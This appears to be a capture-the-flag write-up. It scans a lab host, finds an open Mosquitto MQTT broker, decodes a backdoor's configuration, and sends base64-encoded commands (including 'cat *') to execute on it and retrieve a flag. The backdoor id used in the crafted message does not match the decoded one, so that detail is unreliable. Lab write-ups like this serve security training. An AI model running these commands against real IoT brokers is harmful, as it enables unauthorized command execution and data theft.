Note
John was working on his smart home appliances when he noticed weird traffic going across the network. Can you help him figure out what these weird network communications are?namp
nmap -A -sV -p- 10.10.85.233 Output:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-07 19:03 CET
Nmap scan report for 10.10.85.233
Host is up (0.034s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
1883/tcp open mosquitto version 2.0.14
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/messages/received: 59
| patio/lights: {"id":9498615153902037727,"color":"RED","status":"OFF"}
| $SYS/broker/version: mosquitto version 2.0.14
| $SYS/broker/shared_subscriptions/count: 0
| $SYS/broker/load/publish/dropped/15min: 0.00
| $SYS/broker/load/sockets/1min: 3.22
| $SYS/broker/bytes/sent: 3994
| $SYS/broker/clients/inactive: 0
| $SYS/broker/load/messages/sent/15min: 7.77
| $SYS/broker/load/publish/sent/5min: 11.59
| $SYS/broker/load/sockets/15min: 0.26
| $SYS/broker/clients/connected: 2
| $SYS/broker/load/bytes/received/5min: 540.82
| $SYS/broker/load/messages/sent/5min: 22.75
| $SYS/broker/clients/total: 2
| $SYS/broker/load/publish/received/15min: 0.00
| $SYS/broker/uptime: 33 seconds
| $SYS/broker/subscriptions/count: 3
| $SYS/broker/publish/bytes/received: 1981
| $SYS/broker/messages/sent: 142
| $SYS/broker/store/messages/bytes: 296
| $SYS/broker/load/publish/dropped/1min: 0.00
| $SYS/broker/clients/active: 2
| $SYS/broker/load/messages/received/15min: 3.86
| $SYS/broker/store/messages/count: 52
| $SYS/broker/load/publish/sent/15min: 3.91
| $SYS/broker/publish/messages/dropped: 0
| $SYS/broker/clients/disconnected: 0
| $SYS/broker/publish/bytes/sent: 675
| $SYS/broker/publish/messages/received: 0
| $SYS/broker/publish/messages/sent: 84
| $SYS/broker/load/sockets/5min: 0.76
| livingroom/speaker: {"id":4007409197343670969,"gain":45}
| $SYS/broker/load/publish/sent/1min: 53.91
| $SYS/broker/load/bytes/sent/15min: 189.97
| $SYS/broker/load/publish/received/5min: 0.00
| $SYS/broker/load/bytes/received/15min: 187.07
| $SYS/broker/load/bytes/sent/5min: 561.92
| $SYS/broker/load/publish/received/1min: 0.00
| $SYS/broker/clients/maximum: 2
| $SYS/broker/load/publish/dropped/5min: 0.00
| $SYS/broker/bytes/received: 2859
| $SYS/broker/load/messages/received/1min: 45.29
| kitchen/toaster: {"id":14194221257404514717,"in_use":false,"temperature":153.88422,"toast_time":272}
| yR3gPp0r8Y/AGlaMxmHJe/qV66JF5qmH/config: eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==
| $SYS/broker/load/messages/sent/1min: 99.20
| $SYS/broker/messages/stored: 52
| $SYS/broker/load/messages/received/5min: 11.17
| $SYS/broker/load/connections/5min: 0.58
| $SYS/broker/load/connections/1min: 2.46
| $SYS/broker/load/bytes/sent/1min: 2587.53
| $SYS/broker/retained messages/count: 51
| $SYS/broker/clients/expired: 0
| $SYS/broker/load/bytes/received/1min: 2188.79
| $SYS/broker/load/connections/15min: 0.20
|_ storage/10.10.85.233thermostat: {"id":2291235996486415869,"temperature":23.365356}The port 1883 is open, the service is mosquito version 2.0.14.
We can also see mqtt-subscribe.
Documentation
https://cs.pomona.edu/classes/po181u/docs/labs/lab4/
I have to install mosquito:
sudo pacman -S mosquitto- mosquitto_pub : for publishing to MQTT servers
- mosquitto_sub : for subscribing to MQTT servers
-h : mqtt host to connnect to. Defaults to localhost -t : mqtt topic to publish/subscribe to -m : mqtt message body for publication -v : print published messages verbosely
Get base64 string
I’m looking for all the datas with mosquitto_sub.
mosquitto_sub -h 10.10.85.233 -t "#"
echo eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ== |base64 -dOutput:
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","registered_commands":["HELP","CMD","SYS"],"pub_topic":"U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub","sub_topic":"XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"}The ID is : cdd1b1c0-1c40-4b0f-8e22-61b357548b7d
registered_commands: CMD should be usefull for us.
pub_topic:U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub
sub_topic:XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub
Now we can try to publish a command.we also need to let the subscriber listen.
Send a command
Subscriber
mosquitto_sub -h 10.10.85.233 -t "#" Publisher
mosquitto_pub -h 10.10.85.233 -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "eqrgijkosrgfuheqrguirgequi"
Decode it
echo SW52YWxpZCBtZXNzYWdlIGZvcm1hdC4KRm9ybWF0OiBiYXNlNjQoeyJpZCI6ICI8YmFja2Rvb3IgaWQ+IiwgImNtZCI6ICI8Y29tbWFuZD4iLCAiYXJnIjogIjxhcmd1bWVudD4ifSk= |base64 -dOutput
Invalid message format.
Format: base64({"id": "<backdoor id>", "cmd": "<command>", "arg": "<argument>"})% Use the backdoor
We need to encode it in base64.
echo '{"id": "4879005204976514238", "cmd": "CMD", "arg": "cat *"}' |base64Output:
eyJpZCI6ICI0ODc5MDA1MjA0OTc2NTE0MjM4IiwgImNtZCI6ICJDTUQiLCAiYXJnIjogImNhdCAq
In0KThis will be our message.
mosquitto_pub -h 10.10.85.233 -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "eyJpZCI6ICI0ODc5MDA1MjA0OTc2NTE0MjM4IiwgImNtZCI6ICJDTUQiLCAiYXJnIjogImNhdCAqIn0K"FLag
echo eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZ3sxOGQ0NGZjMDcwN2FjOGRjOGJlNDViYjgzZGI1NDAxM31cbiJ9 |base64 -dOutput:
{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","response":"flag{18d44fc0707ac8dc8be45bb83db54013}\n"}